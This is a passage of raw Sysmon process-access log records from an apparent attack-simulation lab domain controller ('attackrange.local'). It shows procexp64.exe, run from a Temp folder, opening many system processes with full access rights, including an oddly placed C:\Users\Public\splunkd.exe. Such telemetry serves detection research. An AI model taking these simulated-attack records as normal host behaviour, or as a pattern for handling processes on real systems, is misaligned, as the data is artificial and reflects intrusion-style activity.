Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786282Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786281Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786280Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786279Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786278Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786277Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786276Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786275Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786274Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786273Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786272Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786271Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786270Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786269Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786268Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786267Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786266Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786265Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786264Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786263Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786262Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786261Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786260Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786259Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786258Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786257Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786256Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786255Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786254Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786253Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786252Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786251Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786250Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786249Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786248Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786247Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786246Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:01.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786245Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 